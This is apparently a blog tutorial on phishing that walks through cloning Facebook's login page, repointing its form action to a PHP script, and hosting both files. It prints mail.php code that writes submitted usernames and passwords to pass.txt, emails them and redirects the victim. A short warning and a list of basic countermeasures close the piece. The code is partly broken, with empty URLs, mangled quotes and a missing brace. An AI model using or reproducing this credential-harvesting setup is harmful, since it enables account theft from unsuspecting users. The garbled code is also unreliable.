Phishing Explained | Stealing Facebook Account’s Password!

In this tutorial, we’ll learn about Phishing and ways to perform it. We’ll also try to steal facebook account’s password of our target using phishing technique.

What is Phishing?


Phishing is a hacking technique in which an attacker set up a fake website (cloning original website). The cloned website looks identical (or at least similar) to genuine website. An average internet user fails to differentiate between legitimate and fake websites.

These cloned website are usually created using some sort of software that are able to copy legitimate website or at least login page and other important pages.

How Phishing Works?

After setting up phishing website, the attacker uses social engineering techniques to send the innocent target (an individual or may be mass population) to this website. An innocent target – unknown of the fact that it’s a phishing website, usually enters his login details to enter into the website. Phishing website saves all the details in database for its owner (attacker), who can view these details later anytime.

When you submit your password credentials to these phishing websites, they redirect you to the original website. This way you never realize what just had happened.

Facebook Phishing Demonstration

Now, I’m going to demonstrate you how phishing is done (with the help of a video) and how to protect yourself against phishing attacks.

Unfortunately, I have to mention Facebook example here for the sake of educating you. I hope you’ll use this knowledge to protect yourself and loved once.

WARNING: Never try phishing on anyone in real life. It’s illegal and a crime. One time fun can be turned into lifetime prison. Mind it, I have already warned you.

Steps Involved

To perform phishing a hacker needs following resources:

  1. A webserver or web-host (where your phishing websites will be hosted)
  2. A phishing website (with the facility to store login details)

Now the Facebook Phishing procedure:

  1. Firstly, a hacker will setup an account at some free web hosting service.
  2. Then, the hacker selects* sub-domain (refer to the video) (*name changed). Then, he confirms his free web-hosting account via email verification.
  3. Now he visits to and make a right click on the facebook login page, he chooses the option “view page source”. Now, source code of facebook page is available and he copies the complete code.
  4. Then, the hacker opens notepad++ application and paste all the copied source-code there. Now he searches for ‘action’ word in it and locates to following statements:
     <form id=”login_form” action=”” method=”post” onsubmit=”return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)”> 
  5. He Changes the above BOLD link to* URL (exact path to mail.php file) and then saves the file as index.htm.
  6. Following is the mail.php file’s code that hacker uses.

Finally, data (username, password and other details) entered on phishing page is transferred to mail.php which handles it and stores all data in pass.txt file the hacker.

At the end, when both the files (index.html and mail.php) are ready. Hacker Login to web hosting account and uses file manager to upload these two files (refer to video).

Source Code: MAIL.PHP

This is the backend file that will handle the data send by index.php.



header (‘Location:’);

$posts        = ‘’;

foreach($_POST as $k => $v){

$posts .= ‘$_POST[‘.$k.’] = ‘.$v.”n”;


$posts  .= “——————————————n”;

$emailto = ”;

$from    = “”;

$body        = ‘



@mail($emailto, $subject, $body, $from);

$handle = @fopen(“pass.txt”, “a+”);

@fwrite($handle, $posts);



Now, Facebook phishing website is ready. It is capable of storing password & other details in pass.txt file. And an innocent person is going to lose his facebook account. Sad! 

How Facebook Account will be Hacked?

So, the story is

  1. Hacker uses social engineering to trick the target to visit phishing website
  2. Innocent target will try to log-in into his Facebook Account with a valid combination of his username and password.
  3. Behind the scenes: His facebook credentials will be logged into pass.txt file (hacker can read this anytime).

Phishing Facebook

When the Hacker will get time, he will log-in to his web hosting account and will read the all facebook username and password from pass.txt file.

Facebook Account Password

Good New! YouTube and other video hosting website regularly removes “Facebook phishing” videos. But I found it online for you:

  • Transcript:
  • Video:

Countermeasures | Fight Against Phishing!

Here are few basic tips that protect you from getting phished! Follow them:

  1. Always use well know  and trusted web browsers like Google Chrome, Mozilla Firefox, Apple-Safari, Opera, IE etc. They are able to detect phishing pages (refer to video).
  2. Use a good antivirus (additionally anti-spyware & anti-adware protection). They can easily detect and block phishing pages.
  3. Always check browser’s address bar to confirm the webpage address is valid. Note: Secure websites uses https:// instead of http:// (‘s’ can be seen as secure) e.g., and All Banking website etc.
  4. Don’t visit untrusted website and NEVER submit personal details (such as username, account’s password, PIN and other important credential).
Shares 0